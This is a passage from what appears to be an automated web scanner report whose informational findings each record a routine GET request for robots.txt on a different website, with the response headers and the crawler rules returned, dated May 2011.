Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /jsp/login/
Disallow: /jsp/account/
Disallow: /jsp/trolley/
Disallow: /jsp/checkout/
Disallow: /*fh_start_index=
Disallow: /*fh_sort_by=
Disallow: /*sortBy=
Disallow: /*fh_sort
...[SNIP]...

27.1426. http://www.scripps.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scripps.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scripps.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 00:54:57 GMT
Content-Type: text/plain
Connection: close
Content-Length: 66
Last-Modified: Sat, 30 Apr 2011 15:49:12 GMT
Accept-Ranges: bytes

User-agent: *
Allow: /

User-agent: Googlebot-Mobile
Disallow: /

27.1427. http://www.scripture4all.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scripture4all.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scripture4all.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:08 GMT
Server: Apache
Last-Modified: Sun, 30 May 2010 07:49:04 GMT
ETag: "4382a5-24-487caf962fc00"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

27.1428. http://www.sdgln.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdgln.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sdgln.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 19 Jan 2011 07:23:05 GMT
ETag: "df31be0-63f-49a2de3544840"
Accept-Ranges: bytes
Content-Length: 1599
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1429. http://www.sdstate.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdstate.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sdstate.edu

Response

HTTP/1.1 200 OK
Content-Length: 681
Content-Type: text/plain
Content-Location: http://www.sdstate.edu/robots.txt
Last-Modified: Mon, 14 Mar 2011 17:30:49 GMT
Accept-Ranges: bytes
ETag: "a0b09d8f6de2cb1:28d2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:21:43 GMT
Connection: close

User-agent: Googlebot
Disallow:
User-agent: MSNBot
Disallow:
User-agent: Slurp
Disallow:
User-agent: yahoo-mmcrawler
Disallow:
User-agent: yahoo-blogs/v3.9
Disallow:
User-agent: *
Dis
...[SNIP]...

27.1430. http://www.searchfreefonts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchfreefonts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.searchfreefonts.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 13 May 2010 23:43:27 GMT
Accept-Ranges: bytes
ETag: "60869915f6f2ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:20:54 GMT
Connection: close
Content-Length: 157

User-agent: *
Disallow: /global/
Disallow: /local/
Disallow: /bunnys/
Disallow: /download/

Sitemap: http://www.searchfreefonts.com/sitemap-index.xml

27.1431. http://www.searchthing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchthing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.searchthing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:48:13 GMT
Server: Apache/1.3.27 (Unix)
Last-Modified: Thu, 21 Apr 2011 00:58:08 GMT
ETag: "1024850-6b-4daf8120"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Allow: /
User-agent: msnbot
Allow:
User-agent: bingbot
Allow:
User-agent: *
Allow:

27.1432. http://www.seascanner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seascanner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seascanner.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:29:50 GMT
Server: Apache/2.2
Last-Modified: Tue, 29 Mar 2011 00:18:25 GMT
Accept-Ranges: bytes
Content-Length: 373
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *Disallow: /buchungsanfrage.phpDisallow: /rei/Disallow: /*sortierung=
User-agent: MJ12botDisallow: /User-agent: Mediapartners-Google*Disallow:
User-agent: Proximic
Disallow: /

Us
...[SNIP]...

27.1433. http://www.seashepherd.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seashepherd.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seashepherd.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:41 GMT
Server: Apache
Last-Modified: Thu, 09 Apr 2009 03:27:35 GMT
ETag: "3d088cd-168-d443d7c0"
Accept-Ranges: bytes
Content-Length: 360
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1434. http://www.secfilings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.secfilings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.secfilings.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 13 Apr 2009 18:58:16 GMT
Accept-Ranges: bytes
ETag: "b1cda3cd69bcc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:58:56 GMT
Connection: close
Content-Length: 27

User-Agent: *
Allow: /


27.1435. http://www.seds.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seds.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seds.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:50:51 GMT
Server: Apache
Last-Modified: Sun, 05 Sep 2010 00:52:52 GMT
ETag: "1af799fc-ba8-48f7895634100"
Accept-Ranges: bytes
Content-Length: 2984
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# robots.txt for http://seds.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# irres
...[SNIP]...

27.1436. http://www.seedrack.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seedrack.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seedrack.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:39 GMT
Server: Apache
Last-Modified: Thu, 08 Jan 2009 17:18:10 GMT
ETag: "8ac81c-5c-d31a7880"
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ares/
Disallow: /invoices/
Disallow: /cgi-bin/
Disallow: /mofcart/

27.1437. http://www.seekforall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seekforall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seekforall.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:41 GMT
Server: Apache/2
Last-Modified: Mon, 16 Aug 2010 22:22:06 GMT
ETag: "18e85ad-19-48df843381f80"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.1438. http://www.segodnya.ua/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.segodnya.ua
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.segodnya.ua

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:21:32 GMT
Content-Type: text/plain; charset=windows-1251
Content-Length: 455
Last-Modified: Sat, 19 Mar 2011 11:17:57 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /t1/
Disallow: /user/
Disallow: /js/
Disallow: /i/
Disallow: /bn/
Disallow: /g/
Disallow: /pix/
Disallow: /basket/
Disallow: /bn/
Disallow: /sendtofriend/
Disallow: /advertisem
...[SNIP]...

27.1439. http://www.semiaccurate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semiaccurate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.semiaccurate.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:57:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Vary: Cookie,Accept-Encoding
X-Pingback: http://semiaccurate.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8


# XML Sitemap Feed 3.9.1 (http://4visions.nl/en/wordpress-plugins/xml-sitemap-feed/)
Sitemap: http://semiaccurate.com/sitemap.xml
Sitemap: http://semiaccurate.com/sitemap-news.xml

User-agent: *
Disa
...[SNIP]...

27.1440. http://www.sensagent.eu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sensagent.eu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sensagent.eu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:30:55 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 15:35:01 GMT
ETag: "100000000238a-49-492815630349b"
Accept-Ranges: bytes
Content-Length: 73
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

#liste des r.pertoires . ne pas indexer
User-agent: *
Disallow: /


27.1441. http://www.senteacher.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.senteacher.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.senteacher.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:50 GMT
Server: Apache
Last-Modified: Fri, 18 Aug 2006 15:10:36 GMT
ETag: "120036-91-41b4c2995f300"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cache/
Disallow: /templates/
Disallow: /senadmin/
Disallow: /filestore/
Disallow: /cgi-bin/
Disallow: /includes/

27.1442. http://www.sepw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sepw.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sepw.com

Response

HTTP/1.1 200 OK
Content-Length: 1129
Content-Type: text/plain
Last-Modified: Thu, 06 Mar 2008 19:36:06 GMT
Accept-Ranges: bytes
ETag: "9be55d52c17fc81:fb16"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:05:23 GMT
Connection: close

# Keeps Googlebot out of private files
#
User-agent: Googlebot
Disallow: /_private/
Disallow: /_vti_cnf/
Disallow: /_vti_log/
Disallow: /_vti_pvt/
Disallow: /_vti_script/
Disallow: /_vti_txt/
...[SNIP]...

27.1443. http://www.seymourduncan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seymourduncan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seymourduncan.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Oct 2008 16:20:53 GMT
ETag: "9053c0-22-1128c340"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

27.1444. http://www.shadesoflight.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shadesoflight.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shadesoflight.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:59:49 GMT
Server: Apache
Last-Modified: Wed, 19 Aug 2009 15:16:57 GMT
ETag: "7bc0a8-2f1-471802035ec40"
Accept-Ranges: bytes
Content-Length: 753
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /cgi-bin/
Disallow: /*?
Disallow: /catalog/
Disallow: /search.php
Disallow: /cart.php
Disallow: /help.php
Disallow: /giftcert.php
Disallow: /product.php
Disallow: /orde
...[SNIP]...

27.1445. http://www.shadetreepowersports.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shadetreepowersports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shadetreepowersports.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:17 GMT
Server: Apache
Last-Modified: Mon, 04 Apr 2011 12:35:22 GMT
ETag: "484a6-38f-fe3d5680"
Content-Length: 911
Connection: close
Content-Type: text/plain; charset=windows-1252
Expires: Wed, 04 May 2011 04:16:17 GMT

#
# robots.txt for Shade Tree domains
# $Id: robots.txt v 1.0 2009/12/10 12:13pm pn $
#
# all
# shadetreepowersports.com

User-agent: rogerbot
Disallow: /

#User-agent: *
#Disallow: *

...[SNIP]...

27.1446. http://www.sharethatboy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharethatboy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sharethatboy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 04 Jul 2010 06:42:51 GMT
ETag: "71d02cd-86-48a8a2105f0c0"
Accept-Ranges: bytes
Content-Length: 134
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /cache/
Disallow: /content/
Disallow: /ftp_content/
Disallow: /includes/
Disallow: /process/

27.1447. http://www.sharis.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharis.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sharis.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 18 May 2010 19:58:58 GMT
Accept-Ranges: bytes
ETag: "c798e68dc4f6ca1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:28:39 GMT
Connection: close
Content-Length: 197

User-agent: *
Disallow: /layout.html
Disallow: /classes/
Disallow: /include/
Disallow: /admin/
Disallow: /documents/
Disallow: /board/
Disallow: /bank/
Disallow: /lender/
Disallow: /iem/

27.1448. http://www.sheezyart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheezyart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sheezyart.com

Response

HTTP/1.0 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Date: Wed, 04 May 2011 03:27:15 GMT
Server: lighttpd/1.4.26

User-Agent: Googlebot
Disallow:

27.1449. http://www.sheffieldfinancial.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheffieldfinancial.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sheffieldfinancial.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:00 GMT
ETag: "4bab82d4-cc-a1084"
Last-Modified: Thu, 25 Mar 2010 15:35:48 GMT
Content-Type: text/plain
Content-Length: 204
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1450. http://www.sheishairy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheishairy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sheishairy.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:14:44 GMT
Content-Type: text/plain
Content-Length: 80
Last-Modified: Sun, 18 Jul 2010 09:33:27 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /out.php
Sitemap: http://www.sheishairy.com/sitemap.xml

27.1451. http://www.shelbystar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shelbystar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shelbystar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:41 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Tue, 03 May 2011 21:56:31 GMT
Expires: Wed, 04 May 2011 21:56:31 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 922
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...

27.1452. http://www.shelteroffshore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shelteroffshore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shelteroffshore.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:24 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sun, 29 Apr 2007 15:05:36 GMT
ETag: "31cb0-63-42f41b3659000"
Accept-Ranges: bytes
Content-Length: 99
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Sitemap: http://www.shelteroffshore.com/sitemap.php
Disallow:

27.1453. http://www.shodor.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shodor.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shodor.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 27 Sep 2010 19:16:10 GMT
ETag: "13892dd-200c-491428f9ad280"
Accept-Ranges: bytes
Content-Length: 8204
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BALANCEID=balancer.shodor1; path=/; domain=.shodor.org
Connection: close

User-agent: LinkChecker
Allow: /interactivate/
User-agent: *
Disallow: /refdesk/feedback
Disallow: /refdesk/login
Disallow: /~abarreto/interactivate/
Disallow: /~bobbys/
Disallow: /~*/newdev*
Disallow
...[SNIP]...

27.1454. http://www.shopkitson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopkitson.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopkitson.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:04 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Mon, 16 Nov 2009 19:33:30 GMT
ETag: "6a20d4-195-478821594d680"
Accept-Ranges: bytes
Content-Length: 405
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

User-agent: *
Disallow: /styles/

User-agent: *
Disallow: /admin/

User-agent: *
Disallow: /downloads/

User-agent: *
Disallow: /gadgets/

User-agent:
...[SNIP]...

27.1455. http://www.shoppinglifestyle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoppinglifestyle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shoppinglifestyle.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Thu, 15 May 2008 08:20:20 GMT
Accept-Ranges: bytes
ETag: "2280d8464b6c81:216b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:34 GMT
Connection: close

User-agent: *
Disallow:

27.1456. http://www.shopshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopshop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shopshop.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 11 Feb 2008 09:55:28 GMT
Accept-Ranges: bytes
ETag: "3db71f3b946cc81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:42:09 GMT
Connection: close
Content-Length: 78

User-agent: *
Disallow: /shopshop.com/http://shopshop.com/prom-shoes.html


27.1457. http://www.short-hair-styles-magazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.short-hair-styles-magazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.short-hair-styles-magazine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:43:26 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.short-hair-styles-magazine.com/8naNx8Fx.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disa
...[SNIP]...

27.1458. http://www.shoutbox.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoutbox.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shoutbox.de

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 03:37:48 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 01 Oct 2010 21:39:26 GMT
ETag: "43a03a5-1a-491950754df80"
Accept-Ranges: bytes
Content-Length: 26

User-agent: *
Disallow:



27.1459. http://www.showbiz411.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.showbiz411.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.showbiz411.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:03 GMT
Server: Apache
X-Pingback: http://www.showbiz411.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1460. http://www.showmethecurry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.showmethecurry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.showmethecurry.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 11 Sep 2009 22:24:33 GMT
Accept-Ranges: bytes
Content-Length: 657
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Wed, 04 May 2011 02:01:24 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=UTF-8

sitemap: http://showmethecurry.com/sitemap.xml

User-agent: *
Disallow: /cgi-bin/
Disallow: /go/
Disallow: /wp/wp-admin/
Disallow: /wp/wp-includes/
Disallow: /author/
Disallow: */page/*
Disallow: /wp/
...[SNIP]...

27.1461. http://www.shtfplan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shtfplan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shtfplan.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:40 GMT
Server: Apache
X-Pingback: http://www.shtfplan.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1462. http://www.sillybandz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sillybandz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sillybandz.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Last-Modified: Thu, 28 Oct 2010 21:48:21 GMT
ETag: "434729-17-493b44cef7340"
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 23
Date: Wed, 04 May 2011 00:44:51 GMT
X-Varnish: 1078630961
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow:

27.1463. http://www.silvalifesystem.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silvalifesystem.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.silvalifesystem.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:40:13 GMT
Content-Type: text/plain
Content-Length: 1393
Last-Modified: Tue, 03 May 2011 04:38:02 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1464. http://www.silverandblackpride.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverandblackpride.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.silverandblackpride.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:48 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:39 GMT
ETag: "6019f5-d0-49e83f7a8546e"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

27.1465. http://www.silverleafresorts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverleafresorts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.silverleafresorts.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:05 GMT
Server: Apache/2.2.16 (Win32)
Last-Modified: Tue, 21 Sep 2010 07:33:26 GMT
ETag: "ef-490c00b6eb460"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: text/plain

#
# robots.txt for silverleafresorts.com
#
User-agent: *
Disallow: /images/
Disallow: /css/
Disallow: /favicon.ico
Disallow: /iepngfix.htc
Disallow: /media/user/tours/
Disallow: /media/homepa
...[SNIP]...

27.1466. http://www.silverscreenandroll.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverscreenandroll.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.silverscreenandroll.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:53:09 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:38 GMT
ETag: "7e17e2-d0-49e83f79c2397"
Accept-Ranges: bytes
Content-Length: 208
